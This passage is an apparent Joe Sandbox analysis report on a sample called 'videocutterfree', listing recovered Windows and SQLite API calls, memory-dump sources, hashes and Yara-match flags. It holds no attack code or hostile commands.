                                                                              • Opcode Fuzzy Hash: 691f094c9553fcb04969cb104cc9ce1ca9abfc3f334303767016b1c748b5d4e6
                                                                              • Instruction Fuzzy Hash: 8D317A71108701AFC720DF2AD885A6BB7E9FFD8720F140A1EF49683650D734E905DB91
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 0099CEAC
                                                                                • Part of subcall function 00991A01: TlsGetValue.KERNEL32 ref: 00991A0A
                                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0099CF2B
                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 0099CF47
                                                                              • InterlockedIncrement.KERNEL32(009C40F0), ref: 0099CF6C
                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 0099CF81
                                                                                • Part of subcall function 009927F3: SetWaitableTimer.KERNEL32(00000000,?,000493E0,00000000,00000000,00000000,00000000,00000000,0000000A,00000000), ref: 0099284E
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalInterlockedSection$EnterExchangeH_prologIncrementLeaveTimerValueWaitable
                                                                              • String ID:
                                                                              • API String ID: 1578506061-0
                                                                              • Opcode ID: c5005c5952383fb9fde68f19fadd186054c71235af520e5a107c7156c650f934
                                                                              • Instruction ID: 1a15213002de0eafe476c6da7729f6fca2822717c9f9695a1c9d6f8feeb7463b
                                                                              • Opcode Fuzzy Hash: c5005c5952383fb9fde68f19fadd186054c71235af520e5a107c7156c650f934
                                                                              • Instruction Fuzzy Hash: 1D3159B19053059FDB10DFA9C944BAEBBF8FF48310F14851EE84AD7641E735AA04CBA0
                                                                              APIs
                                                                                • Part of subcall function 60925326: sqlite3_log.SQLITE3 ref: 60925352
                                                                              • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,609254CC), ref: 6092538E
                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 609253C4
                                                                              • sqlite3_log.SQLITE3 ref: 609253E2
                                                                              • sqlite3_log.SQLITE3 ref: 60925406
                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 60925443
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_log$sqlite3_mutex_leave$sqlite3_mutex_enter
                                                                              • String ID:
                                                                              • API String ID: 3336957480-0
                                                                              • Opcode ID: 1198911827aa14b9fab328e6e7c73bc961b2278be0ca20fe6461460b1b30ceeb
                                                                              • Instruction ID: a100dd02d465b32589d57b5b9efe4db3cd483c3b5de54de748c9b161d5d001e2
                                                                              • Opcode Fuzzy Hash: 1198911827aa14b9fab328e6e7c73bc961b2278be0ca20fe6461460b1b30ceeb
                                                                              • Instruction Fuzzy Hash: D3315A70228704DBDB00EF28D49575ABBE6AFA1358F00886DE9948F36DD778C885DB02
                                                                              APIs
                                                                              • sqlite3_result_blob.SQLITE3 ref: 609613D0
                                                                              • sqlite3_column_int.SQLITE3 ref: 6096143A
                                                                              • sqlite3_data_count.SQLITE3 ref: 60961465
                                                                              • sqlite3_column_value.SQLITE3 ref: 60961476
                                                                              • sqlite3_result_value.SQLITE3 ref: 60961482
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_column_intsqlite3_column_valuesqlite3_data_countsqlite3_result_blobsqlite3_result_value
                                                                              • String ID:
                                                                              • API String ID: 3091402450-0
                                                                              • Opcode ID: 15f5c91e7d752206cb5be57281081ebbda5684d1dfb7c3b21a78c03d1c189b87
                                                                              • Instruction ID: 8b12398a3b1f37ca0d2e1a8d549e1f0529ecbd38da511dd0edd3444da8e5cc4d
                                                                              • Opcode Fuzzy Hash: 15f5c91e7d752206cb5be57281081ebbda5684d1dfb7c3b21a78c03d1c189b87
                                                                              • Instruction Fuzzy Hash: 72314DB19082058FDB00DF29C48064EB7F6FF65354F19856AE8999B361EB34E886CF81
                                                                              APIs
                                                                              • WSASetLastError.WS2_32(00000000), ref: 00992A3B
                                                                              • closesocket.WS2_32 ref: 00992A42
                                                                              • ioctlsocket.WS2_32(?,8004667E,00000000), ref: 00992A89
                                                                              • WSASetLastError.WS2_32(00000000,?,8004667E,00000000), ref: 00992A97
                                                                              • closesocket.WS2_32 ref: 00992A9E
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLastclosesocket$ioctlsocket
                                                                              • String ID:
                                                                              • API String ID: 1561005644-0
                                                                              • Opcode ID: 5fde9109a33859222f871d15a771a27e12eaa8217b72430bb49b9cab43e7acf6
                                                                              • Instruction ID: 9309858002f00bc4bd2d00f619a9c5adfe3e4d5a9c20eed2e8b353e4b47ea720
                                                                              • Opcode Fuzzy Hash: 5fde9109a33859222f871d15a771a27e12eaa8217b72430bb49b9cab43e7acf6
                                                                              • Instruction Fuzzy Hash: B121F276A10205BBDF20ABBC8D4476EB7EC9F84321F14466AE466D32D1EA749D408760
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_free
                                                                              • String ID:
                                                                              • API String ID: 251237202-0
                                                                              • Opcode ID: ee0aefbaff40cad113deb2524f723b57adfc4224f15c8691f87345bc20e459c1
                                                                              • Instruction ID: 8e14962182cb4ba31828fc05f1b37fa5954e33605a362b2e641de35f96add61e
                                                                              • Opcode Fuzzy Hash: ee0aefbaff40cad113deb2524f723b57adfc4224f15c8691f87345bc20e459c1
                                                                              • Instruction Fuzzy Hash: 022137B46087158BC709AF68C48570ABBF6FFA5318F10895DEC958B345DB74E940CB82
                                                                              APIs
                                                                              • sqlite3_aggregate_context.SQLITE3 ref: 6091A31E
                                                                              • sqlite3_value_text.SQLITE3 ref: 6091A349
                                                                              • sqlite3_value_bytes.SQLITE3 ref: 6091A356
                                                                              • sqlite3_value_text.SQLITE3 ref: 6091A37B
                                                                              • sqlite3_value_bytes.SQLITE3 ref: 6091A387
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_aggregate_context
                                                                              • String ID:
                                                                              • API String ID: 4225432645-0
APIs
• _malloc.LIBCMT ref: 009AF160
  • Part of subcall function 009A1D5C: __FF_MSGBANNER.LIBCMT ref: 009A1D73
  • Part of subcall function 009A1D5C: __NMSG_WRITE.LIBCMT ref: 009A1D7A
  • Part of subcall function 009A1D5C: RtlAllocateHeap.NTDLL(00B10000,00000000,00000001), ref: 009A1D9F
• _free.LIBCMT ref: 009AF173
Memory Dump Source
• Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
Yara matches
Similarity
• API ID: AllocateHeap_free_malloc
• String ID:
• API String ID: 1020059152-0
APIs
• __EH_prolog.LIBCMT ref: 009921DA
• InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 009921ED
• TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00000001), ref: 00992224
• TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,00000001), ref: 00992237
• TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00992261
  • Part of subcall function 00992341: InterlockedExchange.KERNEL32(?,00000001), ref: 00992350
  • Part of subcall function 00992341: InterlockedExchange.KERNEL32(?,00000001), ref: 00992360
  • Part of subcall function 00992341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 00992370
  • Part of subcall function 00992341: GetLastError.KERNEL32 ref: 0099237A
Memory Dump Source
• Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
Yara matches
Similarity
• API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
• String ID:
• API String ID: 1856819132-0
APIs
• __EH_prolog.LIBCMT ref: 0099229D
• InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 009922B0
• TlsGetValue.KERNEL32 ref: 009922E7
• TlsSetValue.KERNEL32(?), ref: 00992300
• TlsSetValue.KERNEL32(?,?,?), ref: 0099231C
  • Part of subcall function 00992341: InterlockedExchange.KERNEL32(?,00000001), ref: 00992350
  • Part of subcall function 00992341: InterlockedExchange.KERNEL32(?,00000001), ref: 00992360
  • Part of subcall function 00992341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 00992370
  • Part of subcall function 00992341: GetLastError.KERNEL32 ref: 0099237A
Memory Dump Source
• Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
Yara matches
Similarity
• API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
• String ID:
• API String ID: 1856819132-0
APIs
  • Part of subcall function 00999F14: __EH_prolog.LIBCMT ref: 00999F19
• __CxxThrowException@8.LIBCMT ref: 0099AADE
  • Part of subcall function 009A330A: RaiseException.KERNEL32(?,?,0099E90E,?,?,?,?,?,?,?,0099E90E,?,009BFCF8,?), ref: 009A335F
• WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,009C0B14,?,00000001), ref: 0099AAF4
• InterlockedExchange.KERNEL32(?,00000001), ref: 0099AB07
• PostQueuedCompletionStatus.KERNEL32(?,00000000,00000001,00000000,?,?,?,009C0B14,?,00000001), ref: 0099AB17
• InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0099AB25
Memory Dump Source
• Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
Yara matches
Similarity
• API ID: ExchangeInterlocked$CompletionExceptionException@8H_prologObjectPostQueuedRaiseSingleStatusThrowWait
• String ID:
• API String ID: 2725315915-0
APIs
• InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 00992432
• PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 00992445
• RtlEnterCriticalSection.NTDLL(?), ref: 00992454
• InterlockedExchange.KERNEL32(?,00000001), ref: 00992469
• RtlLeaveCriticalSection.NTDLL(?), ref: 00992470
Memory Dump Source
• Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
Yara matches
Similarity
• API ID: CriticalExchangeInterlockedSection$CompareCompletionEnterLeavePostQueuedStatus
• String ID:
• API String ID: 747265849-0
APIs
• InterlockedIncrement.KERNEL32(?), ref: 00991ED2
• PostQueuedCompletionStatus.KERNEL32(?,?,?,00000000,00000000,?), ref: 00991EEA
• RtlEnterCriticalSection.NTDLL(?), ref: 00991EF9
• InterlockedExchange.KERNEL32(?,00000001), ref: 00991F0E
• RtlLeaveCriticalSection.NTDLL(?), ref: 00991F15
Memory Dump Source
• Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
Yara matches
Similarity
• API ID: CriticalInterlockedSection$CompletionEnterExchangeIncrementLeavePostQueuedStatus
• String ID:
• API String ID: 830998967-0
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
Similarity
• API ID: sqlite3_log
• String ID: ($string or blob too big$|
• API String ID: 632333372-2398534278
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
Yara matches
Similarity
• API ID: _memmove
• String ID: invalid string position$string too long
• API String ID: 4104443479-4289949731
APIs
• WSASetLastError.WS2_32(00000000), ref: 009930C3
• WSAStringToAddressA.WS2_32(?,?,00000000,?,?), ref: 00993102
• _memcmp.LIBCMT ref: 00993141
Strings
Memory Dump Source
• Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
Yara matches
Similarity
• API ID: AddressErrorLastString_memcmp
• String ID: 255.255.255.255
• API String ID: 1618111833-2422070025
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
Similarity
• API ID: Virtual$Protect$Query
• String ID: @
• API String ID: 3618607426-2766056989
APIs
• sqlite3_malloc.SQLITE3 ref: 60928353
  • Part of subcall function 60916FBA: sqlite3_initialize.SQLITE3(60912743,?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5), ref: 60916FC4
• sqlite3_realloc.SQLITE3 ref: 609283A0
• sqlite3_free.SQLITE3 ref: 609283B6
Strings
Memory Dump Source
• Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
Similarity
• API ID: sqlite3_freesqlite3_initializesqlite3_mallocsqlite3_realloc
• String ID: d
• API String ID: 211589378-2564639436
APIs
• __EH_prolog.LIBCMT ref: 00991F5B
• CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,000000FF,?,00000000), ref: 00991FC5
• GetLastError.KERNEL32(?,00000000), ref: 00991FD2
  • Part of subcall function 00991712: __EH_prolog.LIBCMT ref: 00991717
Strings
Memory Dump Source
• Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
Yara matches
Similarity
• API ID: H_prolog$CompletionCreateErrorLastPort
• String ID: iocp
• API String ID: 998023749-976528080
                                                                              • Opcode ID: bd864fdd30d8bba98702103bd39158443604492c85680fc0c2e08fede3af5d7d
                                                                              • Instruction ID: 1e8f7edc9c0085c6951e999df182b120cfd4cf00817f776825fbe308f1341080
                                                                              • Opcode Fuzzy Hash: bd864fdd30d8bba98702103bd39158443604492c85680fc0c2e08fede3af5d7d
                                                                              • Instruction Fuzzy Hash: F621B9B18017459FC720DF6AD50455AFBF8FFA5720B108A1FE4A6D3AA0D7B0A544CF91
                                                                              APIs
                                                                              • _malloc.LIBCMT ref: 009A2914
                                                                                • Part of subcall function 009A1D5C: __FF_MSGBANNER.LIBCMT ref: 009A1D73
                                                                                • Part of subcall function 009A1D5C: __NMSG_WRITE.LIBCMT ref: 009A1D7A
                                                                                • Part of subcall function 009A1D5C: RtlAllocateHeap.NTDLL(00B10000,00000000,00000001), ref: 009A1D9F
                                                                              • std::exception::exception.LIBCMT ref: 009A2932
                                                                              • __CxxThrowException@8.LIBCMT ref: 009A2947
                                                                                • Part of subcall function 009A330A: RaiseException.KERNEL32(?,?,0099E90E,?,?,?,?,?,?,?,0099E90E,?,009BFCF8,?), ref: 009A335F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                              • String ID: bad allocation
                                                                              • API String ID: 3074076210-2104205924
                                                                              • Opcode ID: 60fe27a2dbf6ba4f0add8f311e38a043cb2bb404bac347d08f3981f6c7f68160
                                                                              • Instruction ID: 08f841aa94585b77bc60b0d72d855c4681be5458d63a43b94788ed4a5b08383d
                                                                              • Opcode Fuzzy Hash: 60fe27a2dbf6ba4f0add8f311e38a043cb2bb404bac347d08f3981f6c7f68160
                                                                              • Instruction Fuzzy Hash: 8AE0A03480420DAACF14FBA4DE06AEF7BACAB82310F000555EC10A1192DB709A4086D0
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 009937B6
                                                                              • __localtime64.LIBCMT ref: 009937C1
                                                                                • Part of subcall function 009A13B0: __gmtime64_s.LIBCMT ref: 009A13C3
                                                                              • std::exception::exception.LIBCMT ref: 009937D9
                                                                                • Part of subcall function 009A1283: std::exception::_Copy_str.LIBCMT ref: 009A129C
                                                                                • Part of subcall function 009992D7: __EH_prolog.LIBCMT ref: 009992DC
                                                                                • Part of subcall function 009992D7: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 009992EB
                                                                                • Part of subcall function 009992D7: __CxxThrowException@8.LIBCMT ref: 0099930A
                                                                              Strings
                                                                              • could not convert calendar time to UTC time, xrefs: 009937CE
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: H_prolog$Concurrency::cancellation_token::_Copy_strException@8FromImplThrow__gmtime64_s__localtime64std::exception::_std::exception::exception
                                                                              • String ID: could not convert calendar time to UTC time
                                                                              • API String ID: 1963798777-2088861013
                                                                              • Opcode ID: 96be3c0a1289083471d81f73b910b0d33d4b31d9c36226dae616905709e0e84e
                                                                              • Instruction ID: e0f037cbecc79ff8ddc532c8ac3fdf587600c2a6d93f14d1f133e7ebaba5d453
                                                                              • Opcode Fuzzy Hash: 96be3c0a1289083471d81f73b910b0d33d4b31d9c36226dae616905709e0e84e
                                                                              • Instruction Fuzzy Hash: 79E06DB5C0420DABCF10EFD8D9057FEB7BCEB50314F40855AE820A2681DB7486058B80
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc
                                                                              • String ID: _Jv_RegisterClasses$libgcj-11.dll
                                                                              • API String ID: 1646373207-2713375476
                                                                              • Opcode ID: 84d528d321f1eea6d8a1b68cb749bb1a2441192a5c5952381cf667fabd413772
                                                                              • Instruction ID: e6822cb61b404b68644b44a252d8259deade1a358cfa59fcc717d95409d4d83a
                                                                              • Opcode Fuzzy Hash: 84d528d321f1eea6d8a1b68cb749bb1a2441192a5c5952381cf667fabd413772
                                                                              • Instruction Fuzzy Hash: 0DE04F7062D30586FB443F794D923297AEB5F72549F00081CD9929B240EBB4D440D753
                                                                              APIs
                                                                              • HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,00403C26), ref: 00404829
                                                                              • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,00403C26), ref: 0040484D
                                                                              • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,00403C26), ref: 00404867
                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,00403C26), ref: 00404928
                                                                              • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,00403C26), ref: 0040493F
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: AllocVirtual$FreeHeap
                                                                              • String ID:
                                                                              • API String ID: 714016831-0
                                                                              • Opcode ID: aa1c79425a6e2cd61392854a67e995b6516d68530b710bf6c895b0b32f8b34e0
                                                                              • Instruction ID: a24b006555a53889427afbffb51939042c46b62d0abea148fbc6107f6e5d4a7c
                                                                              • Opcode Fuzzy Hash: aa1c79425a6e2cd61392854a67e995b6516d68530b710bf6c895b0b32f8b34e0
                                                                              • Instruction Fuzzy Hash: 3731D2B5A407029FD3319F24DD45B22B6A4EB84764F11853EF265B76D0E7B8A800974D
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AdjustPointer_memmove
                                                                              • String ID:
                                                                              • API String ID: 1721217611-0
                                                                              • Opcode ID: 20f7653f3db528fb0e33989bdf75cf956be07dcfdf8ca928fe35ec03fbe2128a
                                                                              • Instruction ID: 1247b4e7d1fe124ba7b61669fd22008c4311615fe0e5873ef13e54ea95d747f9
                                                                              • Opcode Fuzzy Hash: 20f7653f3db528fb0e33989bdf75cf956be07dcfdf8ca928fe35ec03fbe2128a
                                                                              • Instruction Fuzzy Hash: 524161356053079EEF245E24D856BBB77E8AF93760F29401EE8458A1E3EF71E880D690
                                                                              APIs
                                                                              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00994149), ref: 009A016F
                                                                                • Part of subcall function 00993FDC: __EH_prolog.LIBCMT ref: 00993FE1
                                                                                • Part of subcall function 00993FDC: CreateEventA.KERNEL32(00000000,?,?,00000000), ref: 00993FF3
                                                                              • CloseHandle.KERNEL32(00000000), ref: 009A0164
                                                                              • CloseHandle.KERNEL32(00000004,?,?,?,?,?,?,?,?,?,?,?,00994149), ref: 009A01B0
                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00994149), ref: 009A0281
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseHandle$Event$CreateH_prolog
                                                                              • String ID:
                                                                              • API String ID: 2825413587-0
                                                                              • Opcode ID: 1f357223770da07b2515a865366f3707160b351e7c5aa52309f41d98d3b2a722
                                                                              • Instruction ID: 42bcc55b908996d3fa1a3d62a93e0c501d704239a087fd42f0571ff94c61c181
                                                                              • Opcode Fuzzy Hash: 1f357223770da07b2515a865366f3707160b351e7c5aa52309f41d98d3b2a722
